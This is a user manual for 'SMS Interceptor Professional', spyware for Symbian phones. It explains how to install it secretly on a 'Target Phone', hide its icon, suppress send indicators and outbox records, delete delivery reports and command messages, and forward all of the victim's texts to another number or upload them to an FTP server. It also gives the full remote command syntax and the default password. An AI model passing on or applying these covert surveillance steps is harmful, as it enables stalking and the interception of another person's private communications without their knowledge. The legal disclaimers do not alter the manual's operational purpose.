How SMS INTERCEPTOR Works

SMS Interceptor Professional edition is intended for professional users who have the
privilege to monitor short messages content on others' mobile phones. Please be aware
that such behavior might be illegal in your country. We suggest you to check local laws
before using this software.

SMS Interceptor Professional can run on various Symbian series phones. The software
starts up automatically when phone is switched on. It does not have any GUI (Graphics
User Interface) or application icon so you could not find it on phone menu. You control
the software by sending SMS commands to it. No doubt, you can control the software
remotely from other phones.

SMS Interceptor Professional has 3 work modes.

A. Forwarding Mode.

In this mode, SMS Interceptor Professional forwards all incoming and outgoing short
messages to a pre-defined number. Recommended mode. Easy to manage.

B. Recording Mode.

In this mode, SMS Interceptor Professional will record all incoming and outgoing short
messages to a file on the phone (in UTF8 format). Size of the file is up to 512K bytes.
SMS log is written to the file in recycle.

You can upload the file to a pre-defined FTP server by SMS Interceptor commands. To
achieve this, GPRS is required. And you should have an FTP server.

C. Forwarding and Recording mode.

Combination of mode A and B. This mode consumes more CPU timing so you should not
use this mode on low-end mobile phones.

Important Features

* Forward and log all incoming and outgoing text messages.

* Forward and log incoming and outgoing text message which is from/to a specific
number.

* Set a "black" number which will NOT be monitored.

* Upload SMS log file to a pre-defined FTP server via GPRS.

* No GUI or application icon on phone menu.

* No message sending indicator (the up arrow icon) displayed on screen when

forwarding.

* Message is not displayed in outbox in any time and any case (for instance: send failed,
reschedule sending).

* Display a customized name if Phone Model is Symbian S60 3rd Ed. Or Symbian 7 .

* Controlled remotely at any time.

* Support all SMS encoding. (UCS2/GSM7Bits/8Bits)

* Starts up automatically upon phone boot.

* Forwarded messages are not displayed in sentbox.

* Delivery report of forwarded messages are removed.

* Information about original message sender/receiver is included in forwarded message.

* Record of forwarded messages is removed from phone database.

* The original incoming and outgoing messages are deleted automatically after they got
forwarded. This feature is configurable.

INSTALLATION PROCEDURE

Actual Installation
1. Download the file with the extension ”.zip ” to your computer. Unzip the zip file
in your computer using Winzip or any unzipping software available in your
computer. If you have no Winzip software, you may download one via the
internet. It’s free to try.

2. Go to the unzipped folder on your computer, then double click it, there you will
see 2 files, these are the User Guide (User_Guide_PRO.PDF) and another file
with an extension “ .SIS “ (The Sms Interceptor Software).

3. Using your phone’s Nokia PC Suite Software on your PC, install the .SIS file to
the Target phone. Do not forget to attach the Target phone to the USB Data Cable
which is also attached to the computer. The Target Phone is the phone where you
wish to spy on.

4. After you transfer the .SIS file to the Target Phone, install it. You will be
prompted several times, just answer Yes. If asked where the software will be
saved, you should select install in “Phone’s Built In Memory”. This ensures that
the software will still work even if the user changes sim.

5. In a few seconds, the software Sms Interceptor Pro will install successfully. Note
that the software Sms Interceptor Pro will be renamed into other less obvious
names but it will still carry an .SIS extension.

6. After installation, power off the phone for 1 minute then restart it.

7. Go to your Target Phone’s Main Menu folder, find an icon named Sms Pro or
Sms Ultra or Sms Interceptor or Sms Anywhere. Click on it to turn it “ON”.
There are instances that the software is located inside one of your Main Menu
folder such as “My Own” folder or others.

8. At this point you may now send commands to set up the Target Phone.
Commands are sent via sms only form other phones.

 9. The very first command to send is your Destination number. This is the number
where intercepted messages are secretly sent into.

* To set the destination phone number to +18888888888, you should send command:

SA12345678 D+18888888888 (change 1 with your own country code followed by

the mobile phone number where intercepted sms
will be sent. Please ensure that both the Target Phone
number and Destination Number are both of the same
Phone Carrier/company)

All SA commands must be sent from other phone units to the target phone via
Sms using the required format. If you were able to install the software
successfully, the SA commands will never appear on the Target Phone’s Inbox
folder.

If you can read the SAxxxxxxxxx commands on the Target Phone, then
something is not right. Please recheck the procedures, or spellings of the
commands you sent.

For other commands format please read Sms Interceptor Commands chapter.

10. If you can not read the SA command you sent on the Target Phone, then it’s
working already.

11. You may also send other SA commands you wish like change password, and
other similar commands.

12. After command Set-up, restart the Mobile Phone. After restarting, try to send
some sms to the target phone for testing. Your message will be intercepted and
secretly forwarded to the Destination number which you have set during set-up.

NOTE: In order for you to also intercept Outgoing messages of the Target
Phone, you must first send command:

* To forward outgoing messages send sms command: SA12345678 S1

SMS Interceptor Commands

SMS Interceptor Professional starts up automatically when the mobile phone is switched
on. It runs as a system service in background. To configure and control SMS Interceptor,
you need to send some specific command to it via SMS.

SMS Interceptor commands are formatted as the pattern below:

SA[password][white space][action][parameter]

[password] is a text password of 8 characters. Each character can be any letters, digits or
symbols. The default password is 12345678. We strong recommend you to change the
password immediately after you install SMS Interceptor. Commands within correct
password will not come into effect.

[white space] is a white space character.

[action] and [parameter] are used to configure and control the software. The following
table gives all supported actions and parameters and corresponding behaviors.

ON N/A Turn on SMS Interceptor service.(default)

OFF N/A Turn of SMS Interceptor service.

P [password] Change password. The parameter is new password. A

password must consist of 8 characters.(default to
12345678)

S 0 Do not forward outgoing messages. (default)

1 Forward outgoing messages.

R 0 Do not forward incoming messages.

1 Forward incoming messages. (default)

D [phone number] Set the forwarded number. The parameter is the forwarded
number. Length of the number can be up to20 characters.
This is how you set where the messages are sent after it got
Intercepted.

L [license code] Install the commercial license code.

I 0 Do not delete original incoming messages. (default)

1 Delete original incoming message after it got forwarded.

N 0 Do not delete original outgoing messages. (default)

1 Delete original outgoing message after it got forwarded.

W 0 Set work mode to MODE A.(default)

1 Set work mode to MODE B.
2 Set work mode to MODE C.

E 0 Set message encoding to UNICODE. (default)

1 Set message encoding to GSM7Bits.
2 Set message encoding to 8Bits.

# [phone number] Set a specific number you want to monitor. After you set
it, the software will only monitor messages from/to this
specific number.

To remove the specific number, please send the command

again with no number.

By default the software monitor all incoming and

outgoing messages.

* [phone number] Set a black number which you do not want to monitor.
After you set it, the software will NOT monitor messages
from/to this black number.

To remove the black number, please send the command

again with no number.

This command is only available in PRO Edition.

C [Internet Aces Set the IAP (Internet Access Point) name to be used for FTP
upload. IAP Point] names can be found on the phone (Tools >Settings >
Connection > Access points).

F [FTP server name Set the domain name or IP address of FTP server. Please
be noted the FTP or IP address] server must support PASV mode.

U [FTP username] Set the FTP account username.

A [FTP password] Set the FTP account password.

T [FTP port] Set the port of FTP server. (default to 21)

GET N/A Start the FTP upload procedure. The software will transfer sms log
to pre-defined FTP server using pre-defined IAP.

H N/A Refresh the SMS log file –delete old log and write new log from
file head. Regularly you should send this command after you have
uploaded log successfully.

BYE N/A Temporarily stop the software until next time the phone is switched
on. You must send the command before you reinstall SMS
Interceptor Professional.

KILL N/A Remove Sms Interceptor Professional from the phone. You might
not be able to install Sms Interceptor Professional on the phone
again. Please be carefully to use this command.

Some COMMAND examples (assume the password is 12345678):

* To change the password to "abcdefgh", you should send command:

SA12345678 Pabcdefgh

* To set the destination phone number to +638888888888, you should send command:

SA12345678 D+638888888888 (change 63 with your own country code followed by

the mobile phone number where intercepted sms
will be sent)

* To monitor messages only from/to a specific number (5555555), you should send
command:

SA12345678 #5555555

* To set FTP server, you should send commands:

SA12345678 Cnet123 (assuming IAP name is net123)

SA12345678 F23.59.64.18 (assuming FTP server IP is 23.59.64.18)

SA12345678 Utom (assuming FTP username is tom)

SA12345678 A987654321 (assuming FTP password is987654321)

* To get SMS log via FTP, you should send command:

SA12345678 GET

* To turn of the SMS Interceptor service, you should send command:

SA12345678 OFF

NOTE:

Any incoming short message which starts with "SA???????? " (? stands for a character) is
considered as a SMS Interceptor command and will not be forwarded.

SMS Interceptor command will be deleted from inbox automatically. No "New SMS
Received" prompts displayed on the phone.

Encoding of short message should conform to your operator. Most operators support
Unicode(default).If you find the forwarding message could not be displayed regularly,
please try GSM7bitsor 8Bits encoding by sending E command.

To upload SMS log via FTP, your FTP server should supports PASV mode. Most FTP
servers support this feature. If you set up the FTP server on your PC, please make sure
there is no firewall or other software block the connection. There is no guarantee SMS
Interceptor Professional can work with all FTP servers in the world. Please try more FTP
servers if you have problem with this feature.

The default configuration for SMS Interceptor Pro is as below:

* Default password is 12345678.

* The service is ON.

* Destination phone number (forward to) is empty.(You must set a destination number.)

* Forward incoming SMS.

* Do not forward outgoing SMS.

* Do not delete original incoming and outgoing SMS.

* Default work mode is mode A.

* Default SMS encoding is UNICODE.

* Default FTP port is 21.

* Monitor all incoming SMS. (No specific or black number defined.)

Known Issues

If you send and receive many messages simultaneously, SMS Interceptor could not
forward all of them at the same time. Some messages will be forwarded after some delay.

It has been observed that if both the target phone and the destination number belongs to
the same mobile carrier company, the messages are sent faster. It is respectfully
suggested that you should do the same.

WARNING: Do not make the destination number as a black number. The intercepted
messages will no longer be sent if you make the destination number a black number.

The software purchased will work only on the phone which you registered during the
purchase process. It can not work on other phones other than the one you specified during
purchase.

Unless you are allowed by law or have the power to conduct spying (such as Police and
other law enforcement agencies), the use of this software for spying purposes may be
illegal in your country. Please check you local laws on this matter. We will not be held
liable for the illegal use of this product.
